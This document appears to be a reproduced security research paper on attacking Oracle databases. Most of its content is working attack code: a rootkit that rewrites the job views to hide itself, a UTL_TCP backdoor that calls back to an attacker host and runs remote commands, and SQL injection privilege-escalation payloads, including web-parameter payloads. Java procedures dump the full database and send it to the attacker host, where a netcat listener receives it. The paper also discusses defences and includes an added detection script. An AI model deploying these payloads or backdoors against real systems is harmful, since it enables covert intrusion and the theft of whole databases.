Published on June 2016 | Categories: Documents | Downloads: 51 | Comments: 0 | Views: 575
Hacking Databases for Owning your Data

Authors:
Cesar Cerrudo (cesar>.at.<argeniss>.dot.<com)
Esteban Martinez Fayo (esteban>.at.<argeniss>.dot.<com)
Argeniss – Information Security
Abstract:
Data theft is becoming a major threat; criminals have identified where the money is. In the last years many databases from Fortune 500 companies were compromised, causing large money losses. This paper discusses the data theft problem focusing on database attacks. We will show actual information about how serious the data theft problem is, we will explain why you should care about database security, and common attacks will be described. The main part of the paper is the demonstration of unknown and not well known attacks that can be used, or are being used, by criminals to easily steal data from your databases. We focus on the most used database servers, MS SQL Server and Oracle Database: it will be shown how to steal a complete database from the Internet, how to steal data using a database rootkit and backdoor, and some advanced database 0day exploits. We will demonstrate that compromising databases is no big deal if they haven't been properly secured. We will also discuss how to protect against these attacks so you can improve database security at your site.
Introduction:
"By one estimate, 53 million people have had data about themselves exposed over the past 13 months" - InformationWeek, 03/20/2006 [1]
That is old news; right now the number of people that have had their data exposed is more than 100 million!
This is just starting: attacks will increase in number and sophistication.
In the next image you can see the Top 10 Customer Data-Loss Incidents as of March 2006:
If you want to be more scared just take a look at:
http://www.privacyrights.org/ar/ChronDataBreaches.htm
There, a chronology of data breaches is kept up to date by Privacy Rights Clearinghouse [2].
These data breaches not only harm the people whose data is compromised; the biggest damage is caused to the company affected by the breach. To illustrate this, let's see some estimated money losses of companies that didn't take care of their data:
● ChoicePoint: $15 million
● B.J.'s Wholesale: $10 million
● Acxiom: $850,000
● Providence Health System: $9 million
Those numbers speak for themselves.
Data about people has more value than people think. Let's see an estimation of how much personal data is worth (open market pricing of personal data from Swipe Toolkit [3]):
You can see why cyber criminals are going for your data. Of course on the black market the prices won't be the same (maybe yes), but 20% of these prices multiplied by, let's say, 100,000 records is good money for a point-and-click job of a few minutes (hack).
Why database security:
You must care about database security because databases are where your most valuable data rest:
● Corporate data.
● Customer data.
● Financial data.
● Etc.
When your databases stop working your company stops working too. Try to do a quick estimation of how much money you would lose if your databases stopped working for a couple of hours, for a day, a week, etc.; instantly you will realize that your databases are the most important thing in your company. I was talking about databases stopping without mentioning a reason; what if your databases get hacked? Then your company can lose millions, and in the worst case it can run out of business.
You must comply with regulations, laws, etc.:
● Sarbanes Oxley (SOX).
● Payment Card Industry (PCI) Data Security Standard.
● Healthcare Services (HIPAA).
● Financial Services (GLBA).
● California Senate Bill No. 1386.
● Data Accountability and Trust Act (DATA).
● Etc.
And that list gets bigger every day, but complying with regulations and laws is not our topic right now; it deserves another paper.
Database vulnerabilities affect all database vendors. I know it's old news, but guess what? It's still a big issue, and some vendors, such as our beloved Oracle (DB2 doesn't seem much better!!), are more affected than others. For instance, in 2006 Oracle released 4 Critical Patch Updates related to the database server, and more than 20 remote (no authentication required) vulnerabilities were fixed. But that's not the worst news: currently there are more than 50 vulnerabilities that are still un-patched on Oracle Database, so no matter if your database servers are up to date with patches, they still can be easily hacked.
To give an idea of how buggy database servers are, let me quickly mention how many 0days Argeniss currently has:
● DB2: 8
● Informix: 2
● Oracle: >50
Nowadays perimeter defense is strong and secure, but that's not enough: databases have many entry points such as web applications, internal networks, partner networks, etc. Any regular database user can hack a database if it's not properly monitored. No matter if operating systems and networks are properly secured, databases still could be mis-configured, have weak passwords, be vulnerable to unknown and known vulnerabilities, etc.
How databases are hacked:
It's important to mention how databases are hacked; having this in mind helps you to better protect them. Let's enumerate some common attacks.
Password guessing/brute-forcing:
If passwords are blank or not strong they can be easily guessed or brute-forced. After a valid user account is found it is easy to completely compromise the database, especially if the database is Oracle.
Passwords and data sniffed over the network:
If encryption is not used, passwords and data can be easily sniffed.
Exploiting mis-configurations:
Some database servers are open by default: lots of functionality enabled and most of the time insecurely configured.
Delivering a Trojan:
This is not a common database server attack, but it's something we are researching and the results are scary; soon we will have one beautiful beast ready, maybe in the next paper you will know about it.
A trojan can be delivered by email, P2P, IM, CD, DVD, pen drive, etc. Once it gets executed on a desktop computer by a company employee, it will get database server and user information in an automatic and stealthy way using configured ODBC, OLEDB and JDBC connections, sniffing, etc. When enough information is collected the trojan can connect to the database servers, trying default accounts if necessary. After a successful login it will be ready to steal data; it could run a 0day to elevate privileges to own the complete database server and also install a database rootkit to hide its actions. All the previous steps will be repeated on every database server found. The trojan can send the stolen data encrypted back to the attacker by email, HTTP, covert channel, etc.
Exploiting known/unknown vulnerabilities:
Attackers can exploit buffer overflows, SQL Injection, etc. in order to own the database server. The attack could be through a web application by exploiting SQL Injection, so no authentication is needed. In this way databases can be hacked from the Internet and firewalls are completely bypassed. This is one of the easiest and preferred methods that criminals use to steal sensitive information such as credit cards, social security numbers, customer information, etc.
Stealing disks and backup tapes:
This is something that is not commonly mentioned; companies always say that disks or backups were lost :)
If data files and backed up data are not encrypted, once stolen the data can be easily compromised.
Installing a rootkit/backdoor:
By installing a rootkit, actions and database objects can be hidden so administrators won't notice that someone hacked the database and continues having access. A database backdoor can be used, designed to steal data and send it to the attacker and/or to give the attacker stealthy and unrestricted access at any given time.
Oracle Database attacks:
Now let's see some attacks for Oracle databases.
Stealing data using a rootkit and backdoor:
To steal data from a database the best option seems to be the combination of a database rootkit and a database backdoor. This will allow an attacker to administer a database from a remote location and to be hidden from the DBA.
Oracle Database Rootkits:
A rootkit is a set of tools used by an attacker after hacking a computer system that hides logins, processes, etc. It is commonly used to hide the operation of an attacker in a compromised system. Rootkits are more widespread in Operating Systems but the idea is applicable to databases too.
There are different ways to implement rootkits in Oracle databases; for more information see [7].
This paper shows an example of a rootkit that modifies data dictionary views to hide the attacker activity.
Oracle Database Backdoors:
This kind of backdoor allows attackers to execute commands and queries on the database from a remote location and get the responses from the server.
Attackers don't want to be visible to database administrators, so backdoors can be used in combination with rootkits to hide the backdoor operations from the DBA.
Implementing an Oracle Database Backdoor:
To implement an Oracle Database Backdoor an attacker can write a program in PL/SQL, Java or a combination of both.
This program will do basically three things:
• Use built-in network functionality to open a connection to the attacker's host.
• Read the connection and execute the commands the attacker sends.
• Write to the opened connection the output of the commands.
This program (the backdoor) can be scheduled, using the Job functionality, to run periodically, so if the connection is lost or the database instance is restarted, the attacker will get connected again at a later time.
In order to avoid detection, the communication between the backdoor and the attacker's host can be encrypted or encoded in some way that is not detected by an IDS or IPS and that is not understandable to someone that is looking at the network traffic.
Proof-of-concept example of a Backdoor and Rootkit:
This example consists of two parts. One part is the PL/SQL scripts that need to be run on the Oracle Database server with administrator privileges (the attacker will have to run these scripts using an exploit to elevate privileges or get administrative access to the server) and the other part is the Backdoor Console.
Backdoor Console:
The Backdoor Console is a GUI application that the attacker runs on his/her computer. It allows the attacker to:
• Send commands to the Backdoor and receive the output.
• View information about the deployed Backdoor.
• Configure the Backdoor.
• Manage multiple Backdoors.
Communication between the Backdoor and the Backdoor Console:
The Backdoor installed in the database server and the Backdoor Console that is running on the attacker's host use TCP/IP to communicate. The Backdoor Console listens on a predefined TCP port (4444) waiting for connections from the database server Backdoor.
When the Backdoor starts, it opens an outgoing TCP connection to a predefined host and port where the Backdoor Console is listening. The first message that the Backdoor sends contains information about the owned database: Database Server type (Oracle, SQL Server), Version, Database name and Database ID.
Backdoor Console screenshot
Then the Backdoor enters a loop repeating these operations:
• Reads from the TCP/IP connection and executes the commands it receives from the Backdoor Console.
• Sends the output to the Backdoor Console.
• Sends an "[[EnD]]" string meaning there is no more output for the command.
It loops until the "EXIT" command is received. When the Backdoor receives the EXIT command, it closes the TCP connection.
Communication between the Backdoor Console and the Backdoor installed in the database (diagram): the Backdoor Console on the attacker host (remote) listens on a TCP port, shows the new owned DB, sends commands and shows the output; the Backdoor on the Oracle Database Server sends info about the owned DB, executes each command and sends the output, looping until "EXIT" is received.
PL/SQL Scripts:
These are PL/SQL scripts that will install (or uninstall) the rootkit and the backdoor in an Oracle database.
OracleRootkit.sql:
This script creates a function that modifies the data dictionary views DBA_JOBS, DBA_JOBS_RUNNING and KU$_JOB_VIEW to hide the backdoor job.
The function can be injected in any SQL Injection vulnerability where a function call can be injected, as is the case of many SQL Injection vulnerabilities recently found in Oracle software.
Below is the script that installs the rootkit. The original views are altered to add a condition in the WHERE clause so the backdoor job is not returned; the part added to each original view definition is the condition on j.what at the end of its WHERE clause (shown in red in the original paper).
CREATE OR REPLACE
FUNCTION ins_rootkit RETURN VARCHAR2 AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'CREATE OR REPLACE FORCE VIEW "SYS"."DBA_JOBS" ("JOB",
"LOG_USER", "PRIV_USER", "SCHEMA_USER", "LAST_DATE", "LAST_SEC", "THIS_DATE",
"THIS_SEC", "NEXT_DATE", "NEXT_SEC", "TOTAL_TIME", "BROKEN", "INTERVAL",
"FAILURES", "WHAT", "NLS_ENV", "MISC_ENV", "INSTANCE") AS
select JOB, lowner LOG_USER, powner PRIV_USER, cowner SCHEMA_USER,
LAST_DATE, substr(to_char(last_date,''HH24:MI:SS''),1,8) LAST_SEC,
THIS_DATE, substr(to_char(this_date,''HH24:MI:SS''),1,8) THIS_SEC,
NEXT_DATE, substr(to_char(next_date,''HH24:MI:SS''),1,8) NEXT_SEC,
(total+(sysdate-nvl(this_date,sysdate)))*86400 TOTAL_TIME,
decode(mod(FLAG,2),1,''Y'',0,''N'',''?'') BROKEN,
INTERVAL# interval, FAILURES, WHAT,
nlsenv NLS_ENV, env MISC_ENV, j.field1 INSTANCE
from sys.job$ j WHERE j.what not like ''DECLARE l_cn UTL_TCP.CONNECTION;%''';
EXECUTE IMMEDIATE 'CREATE OR REPLACE FORCE VIEW "SYS"."DBA_JOBS_RUNNING"
("SID", "JOB", "FAILURES", "LAST_DATE", "LAST_SEC", "THIS_DATE", "THIS_SEC",
"INSTANCE") AS
select v.SID, v.id2 JOB, j.FAILURES,
LAST_DATE, substr(to_char(last_date,''HH24:MI:SS''),1,8) LAST_SEC,
THIS_DATE, substr(to_char(this_date,''HH24:MI:SS''),1,8) THIS_SEC,
j.field1 INSTANCE
from sys.job$ j, v$lock v
where v.type = ''JQ'' and j.job (+)= v.id2 and j.what not like ''DECLARE l_cn UTL_TCP.CONNECTION;%''';
EXECUTE IMMEDIATE 'CREATE OR REPLACE FORCE VIEW "SYS"."KU$_JOB_VIEW" OF
"SYS"."KU$_JOB_T"
WITH OBJECT IDENTIFIER (powner_id) AS
select ''1'',''0'',
u.user#, j.powner, j.lowner, j.cowner, j.job,
TO_CHAR(j.last_date, ''YYYY-MM-DD:HH24:MI:SS''),
TO_CHAR(j.this_date, ''YYYY-MM-DD:HH24:MI:SS''),
TO_CHAR(j.next_date, ''YYYY-MM-DD:HH24:MI:SS''),
j.flag, j.failures,
REPLACE(j.interval#, '''''''', ''''''''''''),
REPLACE(j.what, '''''''', ''''''''''''),
REPLACE(j.nlsenv, '''''''', ''''''''''''),
j.env, j.field1, j.charenv
from sys.job$ j, sys.user$ u
where j.powner = u.name and j.what not like ''DECLARE l_cn UTL_TCP.CONNECTION;%''';
COMMIT;
RETURN '';
END;
OracleBackdoor.sql:
This script creates a function that submits a job that reads commands from the attacker host, executes them and sends the command output back to the attacker.
These are the script contents, with the explanatory comments interleaved (in the original paper they are shown in green):
Create a function named ins_backdoor that executes as the calling user and is defined as an autonomous transaction. These characteristics are required so this function can then be used in a SQL injection exploit.
CREATE OR REPLACE
FUNCTION ins_backdoor RETURN VARCHAR2 AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
job_id NUMBER;
BEGIN
Submit a database job using the job functionality in DBMS_JOB. For the TCP/IP communication with the Backdoor Console it uses the UTL_TCP Oracle standard package. (The job body is passed as one string literal, so every quote inside it is doubled.)
DBMS_JOB.SUBMIT(job_id, 'DECLARE l_cn UTL_TCP.CONNECTION;
l_ret_val PLS_INTEGER;
l_sqlstm VARCHAR2(32000);
l_thecursor INTEGER;
l_columnvalue VARCHAR2(2000);
l_status INTEGER;
l_colcnt NUMBER DEFAULT 0;
l_desc_t DBMS_SQL.DESC_TAB;
BEGIN
Open a connection to the attacker host where the Backdoor Console is running. In this script it is hardcoded to 192.168.253.1 and the TCP port is 4444. You can change it to any other value.
l_cn := UTL_TCP.OPEN_CONNECTION(''192.168.253.1'', 4444, 1521);
Get the information about the database and send it over the TCP connection as an XML document.
SELECT DBID, NAME INTO l_colcnt, l_sqlstm FROM V$DATABASE;
SELECT banner INTO l_columnvalue FROM V$VERSION WHERE ROWNUM = 1;
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, ''<?xml version="1.0" encoding="utf-8" ?
><IncommingConn xmlns="http://tempuri.org/IncomingBackdoorConn.xsd"
DBType="Oracle" ServerVersion="'' || l_columnvalue || ''" DBName="'' || l_sqlstm
|| ''" DBID="'' || l_colcnt || ''"/>'');
LOOP
l_sqlstm := UTL_TCP.GET_LINE(l_cn, TRUE);
EXIT WHEN UPPER(l_sqlstm) = ''EXIT'';
BEGIN
l_thecursor := DBMS_SQL.OPEN_CURSOR;
If the received SQL command is a SELECT it will first get all the column names and send them so the Backdoor Console displays them as the column headers in a grid.
IF (SUBSTR(LTRIM(UPPER(l_sqlstm)), 1, 7)) = ''SELECT '' THEN
DBMS_SQL.PARSE(l_thecursor, l_sqlstm, DBMS_SQL.NATIVE);
DBMS_SQL.DESCRIBE_COLUMNS(l_thecursor, l_colcnt, l_desc_t);
FOR i IN 1 .. l_colcnt LOOP
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''' || l_desc_t(i).col_name);
DBMS_SQL.DEFINE_COLUMN(l_thecursor, i, l_columnvalue, 2000);
END LOOP;
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''');
DBMS_SQL.DEFINE_COLUMN(l_thecursor, 1, l_columnvalue, 2000);
l_status := DBMS_SQL.EXECUTE(l_thecursor);
LOOP
EXIT WHEN (DBMS_SQL.FETCH_ROWS(l_thecursor) <= 0);
FOR i IN 1 .. l_colcnt
LOOP
DBMS_SQL.COLUMN_VALUE(l_thecursor, i, l_columnvalue);
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''' || l_columnvalue);
END LOOP;
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''');
END LOOP;
DBMS_SQL.CLOSE_CURSOR(l_thecursor);
ELSE
If the received SQL command is not a SELECT just execute it using EXECUTE IMMEDIATE.
EXECUTE IMMEDIATE(l_sqlstm);
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, ''PL/SQL successfully completed.'');
END IF;
EXCEPTION
If there are any errors, send the description over the connection.
WHEN OTHERS THEN
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, ''ORACLE ERROR: '' || sqlerrm);
END;
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, ''[[EnD]]'');
END LOOP;
UTL_TCP.CLOSE_CONNECTION(l_cn);
END;'
SYSDATE + 10/86400 is the time when the job must start for the first time. It is 10 seconds after the submission.
'SYSDATE + 1/1440' means that the job will run again every one minute.
, SYSDATE + 10/86400, SYSDATE + 1/1440);
COMMIT;
RETURN '';
END;
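As an added example (not part of the paper or its scripts), the following Python check shows how a DBA can detect what the two scripts above leave behind without trusting the dictionary views alone: it compares SYS.JOB$ against DBA_JOBS, flags jobs whose WHAT text calls a network package such as UTL_TCP, and compares a view's DBA_VIEWS text against a known-good hash. The rows and view bodies are constructed sample data standing in for the query results named in the comments.

```python
"""Dictionary-consistency checks against the job-hiding rootkit and UTL_TCP backdoor
job described above.  Added example, not part of the paper or its scripts; the rows and
view bodies below are constructed sample data standing in for real query results."""
import hashlib
import re

# Packages a scheduled job rarely needs; tune per site (assumption, not from the paper).
NETWORK_PACKAGES = ("UTL_TCP", "UTL_HTTP", "UTL_SMTP", "UTL_INADDR", "DBMS_LDAP")


def _normalise(sql):
    """Collapse whitespace and case so a reformatted but unchanged view still matches."""
    return re.sub(r"\s+", " ", sql).strip().upper()


def hidden_jobs(job_table_rows, dba_jobs_rows):
    """Jobs present in SYS.JOB$ (base table) but missing from DBA_JOBS (view).
    A clean dictionary gives []; the rootkit's extra predicate makes them disagree."""
    visible = {r["JOB"] for r in dba_jobs_rows}
    return sorted(r["JOB"] for r in job_table_rows if r["JOB"] not in visible)


def network_jobs(job_table_rows):
    """(job, package) for each job whose WHAT text references a network package,
    which is how the backdoor job reaches the console host."""
    hits = []
    for r in job_table_rows:
        what = r["WHAT"].upper()
        pkg = next((p for p in NETWORK_PACKAGES if re.search(rf"\b{p}\b", what)), None)
        if pkg:
            hits.append((r["JOB"], pkg))
    return hits


def view_findings(view_text, baseline_sha256):
    """Findings for one dictionary view (DBA_VIEWS.TEXT) against a known-good hash.
    Also flags the pattern this rootkit adds: a predicate filtering rows on WHAT."""
    normalised = _normalise(view_text)
    findings = []
    if hashlib.sha256(normalised.encode()).hexdigest() != baseline_sha256:
        findings.append("definition differs from baseline")
    if re.search(r"\bWHAT\s+NOT\s+LIKE\b", normalised):
        findings.append("filters rows on WHAT")
    return findings


# --- constructed sample data -----------------------------------------------------------
# SELECT job, what FROM sys.job$   (base table; needs SYS access)
JOB_TABLE = [
    {"JOB": 1, "WHAT": "dbms_stats.gather_schema_stats('HR');"},
    {"JOB": 42, "WHAT": "DECLARE l_cn UTL_TCP.CONNECTION; BEGIN l_cn := "
                        "UTL_TCP.OPEN_CONNECTION('192.168.253.1', 4444); END;"},
]
# SELECT job FROM dba_jobs   (the view the rootkit rewrites)
DBA_JOBS_VIEW = [{"JOB": 1}]

# Abbreviated view bodies (constructed, not Oracle's real DBA_JOBS text).  The clean
# one is hashed as the baseline; the second carries the rootkit's extra predicate.
CLEAN_VIEW = "select JOB, lowner LOG_USER, what WHAT from sys.job$ j"
TAMPERED_VIEW = CLEAN_VIEW + " where j.what not like 'DECLARE l_cn UTL_TCP.CONNECTION;%'"
BASELINE = hashlib.sha256(_normalise(CLEAN_VIEW).encode()).hexdigest()


def run_checks():
    """Bundle the three checks; in practice the inputs come from the queries above."""
    return {
        "hidden_jobs": hidden_jobs(JOB_TABLE, DBA_JOBS_VIEW),
        "network_jobs": network_jobs(JOB_TABLE),
        "dba_jobs_view": view_findings(TAMPERED_VIEW, BASELINE),
    }


if __name__ == "__main__":
    for name, result in run_checks().items():
        print(f"{name}: {result}")
```

The same comparison applies to DBA_JOBS_RUNNING and KU$_JOB_VIEW; a DBA_VIEWS baseline is only trustworthy if it was taken before any compromise, for example from a freshly installed instance at the same version and patch level.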
CleanOracleBackdoor.sql:
This script removes all the Backdoor Jobs. To do this it searches for all the Database Jobs starting with 'DECLARE l_cn UTL_TCP.CONNECTION;' and removes them using DBMS_JOB.REMOVE.
DECLARE
CURSOR l_cur_jobs IS
SELECT JOB FROM JOB$ WHERE WHAT LIKE 'DECLARE l_cn UTL_TCP.CONNECTION;%';
l_rec l_cur_jobs%rowtype;
BEGIN
OPEN l_cur_jobs;
LOOP
FETCH l_cur_jobs INTO l_rec;
EXIT WHEN l_cur_jobs%NOTFOUND;
DBMS_JOB.REMOVE(l_rec.job);
COMMIT;
END LOOP;
COMMIT;
END;
CleanOracleRootkit.sql:
Restores the jobs data dictionary views to their original state.
It's similar to OracleRootkit.sql but without the conditions on j.what that were added to hide the backdoor (the text shown in red in the original paper).
Executing these scripts as a DBA user:
As discussed earlier, these scripts need to be run on the database server as a user with DBA privileges. In the previous section "How databases are hacked" we mentioned and described some of the techniques that attackers could use to achieve this.
As a low privilege user connected to the Database:
For this example we will use a PL/SQL injection vulnerability to elevate privileges and execute the functions we just created with DBA privileges.
The vulnerability is in the CHANGE_SET parameter of the DBMS_CDC_SUBSCRIBE.GET_SUBSCRIPTION_HANDLE procedure. To exploit this vulnerability we can execute this:
DECLARE
P_CHANGE_SET VARCHAR2(32767);
P_DESCRIPTION VARCHAR2(32767);
P_SUBSCRIPTION_HANDLE NUMBER;
BEGIN
P_CHANGE_SET := '''||SCOTT.ins_rootkit()||''';
P_DESCRIPTION := 'AA';
P_SUBSCRIPTION_HANDLE := 1;
SYS.DBMS_CDC_SUBSCRIBE.GET_SUBSCRIPTION_HANDLE(P_CHANGE_SET, P_DESCRIPTION,
P_SUBSCRIPTION_HANDLE);
END;
To install the backdoor just change ins_rootkit for ins_backdoor.
As a web application user:
Using a web application vulnerable to SQL injection, an attacker can still install a Rootkit and a Backdoor even if he doesn't have direct access to the Database Server.
The file TableEmpSearch.asp is an example of a web page that is vulnerable to SQL injection attacks (the Search parameter is vulnerable). The vulnerability allows a malicious web user to inject a function call. This function will get executed as the web application database user.
Now we will see that there is a built-in function in Oracle that will help exploit this web application vulnerability.
DBMS_XMLQUERY.GETXML:
There is a function (available since Oracle 9i Release 1) called GETXML in package DBMS_XMLQUERY that executes a query and returns the result in XML format. By default it has EXECUTE privilege granted to PUBLIC. The interesting part is that it allows executing anonymous PL/SQL blocks and, by creating an autonomous transaction, executes not only queries but also DML and DDL statements. No privilege elevation exists here, but this can be used to exploit more easily the many SQL Injection vulnerabilities that require a function to be created, and also to easily exploit a SQL injection in a web application with an Oracle Database backend.
To execute PL/SQL blocks as the web database user an attacker can submit this in the Search parameter of the web page:
'||dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute
immediate ''ANY PL/SQL BLOCK''; commit; end;', 0)||'
This results in the next PL/SQL being executed by the web database user:
SELECT EMPNO, ENAME, JOB FROM SCOTT.EMP WHERE ENAME LIKE ''||
dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute
immediate ''ANY PL/SQL BLOCK''; commit; end;', 0)||'%'
We will assume that the web database user doesn't have DBA privileges but has the CREATE PROCEDURE privilege. So we will create a function that installs the backdoor and later we will exploit a SQL injection vulnerability in one of the Oracle packages to execute this function as SYS.
To create the function to install the Backdoor Job an attacker can send this to the web page parameter vulnerable to SQL injection:
'||dbms_xmlquery.getXml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin
execute immediate ''CREATE OR REPLACE FUNCTION ins_backdoor RETURN VARCHAR2
AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; job_id NUMBER;
l_count NUMBER; BEGIN execute immediate ''''SELECT COUNT(*) FROM JOB$ WHERE
WHAT LIKE ''''''''DECLARE l_cn UTL_TCP.CONNECTION;%'''''''''''' INTO L_COUNT; if
l_count = 0 then DBMS_JOB.SUBMIT(job_id, ''''DECLARE l_cn UTL_TCP.CONNECTION;
l_ret_val PLS_INTEGER; l_sqlstm VARCHAR2(32000); l_thecursor INTEGER;
l_columnvalue VARCHAR2(2000); l_status INTEGER; l_colcnt NUMBER DEFAULT 0;
l_desc_t DBMS_SQL.DESC_TAB; BEGIN l_cn :=
UTL_TCP.OPEN_CONNECTION(''''''''192.168.253.1'''''''', 4444, 1521); SELECT
DBID, NAME INTO l_colcnt, l_sqlstm FROM V$DATABASE; SELECT banner INTO
l_columnvalue FROM V$VERSION WHERE ROWNUM = 1; l_ret_val :=
UTL_TCP.WRITE_LINE(l_cn, ''''''''<?xml version="1.0" encoding="utf-8" ?
><IncommingConn xmlns="http://tempuri.org/IncomingBackdoorConn.xsd"
DBType="Oracle" ServerVersion="'''''''' || l_columnvalue || ''''''''"
DBName="'''''''' || l_sqlstm || ''''''''" DBID="'''''''' || l_colcnt ||
''''''''"/>''''''''); LOOP l_sqlstm := UTL_TCP.GET_LINE(l_cn, TRUE);
EXIT WHEN UPPER(l_sqlstm) = ''''''''EXIT''''''''; BEGIN l_thecursor :=
DBMS_SQL.OPEN_CURSOR; IF (SUBSTR(LTRIM(UPPER(l_sqlstm)), 1, 7)) =
''''''''SELECT '''''''' THEN DBMS_SQL.PARSE(l_thecursor, l_sqlstm,
DBMS_SQL.NATIVE); DBMS_SQL.DESCRIBE_COLUMNS(l_thecursor, l_colcnt,
l_desc_t); FOR i IN 1 .. l_colcnt LOOP l_ret_val :=
UTL_TCP.WRITE_LINE(l_cn, '''''''''''''''' || l_desc_t(i).col_name);
DBMS_SQL.DEFINE_COLUMN(l_thecursor, i, l_columnvalue, 2000); END LOOP;
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''''''''''''''');
DBMS_SQL.DEFINE_COLUMN(l_thecursor, 1, l_columnvalue, 2000); l_status :=
DBMS_SQL.EXECUTE(l_thecursor); LOOP EXIT
WHEN (DBMS_SQL.FETCH_ROWS(l_thecursor) <= 0); FOR i IN 1 .. l_colcnt
LOOP DBMS_SQL.COLUMN_VALUE(l_thecursor, i, l_columnvalue);
l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''''''''''''''' || l_columnvalue);
END LOOP; l_ret_val := UTL_TCP.WRITE_LINE(l_cn, '''''''''''''''');
END LOOP; DBMS_SQL.CLOSE_CURSOR(l_thecursor); ELSE EXECUTE
IMMEDIATE(l_sqlstm); l_ret_val := UTL_TCP.WRITE_LINE(l_cn,
''''''''PL/SQL successfully completed.''''''''); END IF; EXCEPTION
WHEN OTHERS THEN l_ret_val := UTL_TCP.WRITE_LINE(l_cn, ''''''''ORACLE ERROR: ''''''''
|| sqlerrm); END; l_ret_val := UTL_TCP.WRITE_LINE(l_cn,
''''''''[[EnD]]''''''''); END LOOP; UTL_TCP.CLOSE_CONNECTION(l_cn); END;''''
, SYSDATE + 10/86400, SYSDATE + 1/1440); end if; COMMIT; return
''''''''; END;''; commit; end;', 0 )||'
The backdoor job is not created yet. To create it the attacker needs to execute the function ins_backdoor that has just been created as a DBA user. To do this the attacker can send this exploit to the web application's vulnerable parameter:
'||SYS.DBMS_METADATA.GET_DDL('AA'||scott.ins_backdoor||'','')||'
It exploits an Oracle vulnerability in SYS.DBMS_METADATA.GET_DDL (see [8] and [9]) to execute the function scott.ins_backdoor under the SYS user security context.
In a similar way to how the backdoor was installed, the rootkit can also be installed using a web application vulnerable to SQL injection.
Stealing a complete database from Internet:
This is a very simple example of how a complete Oracle database can be stolen from the Internet using an exploit or a backdoor. The database contents are sent compressed using an outgoing connection initiated from the Oracle database server host to the attacker host.
This example consists of two scripts that need to be run after the database has been compromised (they require DBA privilege). The scripts work on all platforms where Oracle runs. There are two different versions of the scripts, one for *nix and another for Windows, the only difference between them being the path locations for files and directories.
export-and-zip.sql:
In this script we create two stored procedures using the Java functionality provided by Oracle to get access to the Operating System.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
import java.lang.*;
import java.io.*;
public class ExecuteOS
{
This Java function creates a text file that will be used to call the Oracle exp utility to export all the database contents to a file.
Parameters:
parfile: File name for the text parameter file that will be created.
export: File name for the exported file.
public static void createParFile (String parfile, String export) throws
IOException
{
File fileOut = new File (parfile);
FileWriter fw = new FileWriter (fileOut);
fw.write("full=y\n");
fw.write("userid=\"/ as sysdba\"\n");
fw.write("file=" + export + "\n");
fw.close();
}
This Java function executes as an OS command the string cmd passed as a parameter.
public static void execOSCmd (String cmd) throws IOException,
java.lang.InterruptedException
{
Process p = Runtime.getRuntime().exec(cmd);
p.waitFor();
}
};
CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
AS LANGUAGE JAVA
NAME 'ExecuteOS.execOSCmd (java.lang.String)';
CREATE OR REPLACE PROCEDURE "PROC_CREATEPARFILE" (p_parfile varchar2, p_export
varchar2)
AS LANGUAGE JAVA
NAME 'ExecuteOS.createParFile (java.lang.String, java.lang.String)';
Execute the Java stored procedures to: create a parameter file for the exp utility, run the exp utility to export the database, and compress the exported file with a zip utility.
Path locations are different, so we have two versions, one for Windows and another for *nix.
-- Windows
BEGIN
PROC_CREATEPARFILE('c:\parfile.txt', 'c:\export.dmp');
PROC_EXECUTEOS ('exp parfile=c:\parfile.txt');
PROC_EXECUTEOS ('zip c:\export.zip c:\export.dmp');
END;
-- Unix
BEGIN
PROC_CREATEPARFILE('parfile.txt', 'export.dmp');
PROC_EXECUTEOS ('../bin/exp parfile=../parfile.txt');
PROC_EXECUTEOS ('/usr/bin/zip export.zip export.dmp');
END;
So, this script creates an export file in the server host containing all the data in the database, compressed in zip format. Now we need to send the file over the network to the attacker host.
send-zip.sql:
This script uses the Java functionality available in Oracle Database Server to open an outgoing TCP connection from the database server to the attacker remote host at a given TCP port number. Once this connection is opened, the script sends all the contents in the exported zip file over this connection.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_FILESEND" AS
import java.lang.*;
import java.io.*;
import java.net.*;
public class FileSend
{
This Java function uses the network functionality in java.net.* to send a local file over a TCP/IP connection to a remote site.
public static void fileSend(String myFile, String host, int port) throws
Exception
{
int length;
byte buffer[] = new byte[1024];
File binaryFile = new File(myFile);
FileInputStream inpStream = new FileInputStream(myFile);
Socket sock = new Socket(host, port);
DataOutputStream dos = new DataOutputStream(sock.getOutputStream());
DataInputStream dis = new DataInputStream(sock.getInputStream());
while ((length = inpStream.read(buffer)) != -1) {
dos.write(buffer, 0, length);
dos.flush();
}
sock.close();
inpStream.close();
}
};
CREATE OR REPLACE PROCEDURE "PROC_FILESEND" (myFile varchar2, Hostname2
varchar2, Port PLS_INTEGER)
AS LANGUAGE JAVA
NAME 'FileSend.fileSend (java.lang.String, java.lang.String, int)';
Execute the Java Stored procedure to send the exported file (export.zip) from the database server to the attacker's host (192.168.253.1, TCP port 4445).
-- Windows
exec PROC_FILESEND ('c:\export.zip', '192.168.253.1', 4445);
-- Unix
exec PROC_FILESEND ('./dbs/export.zip', '192.168.253.1', 4445);
To receive the compressed file with all the database contents, the attacker can use the netcat utility to redirect what is received on a TCP port to a file. This can be done with the following command:
nc -p 4445 -l > oracle-db.zip
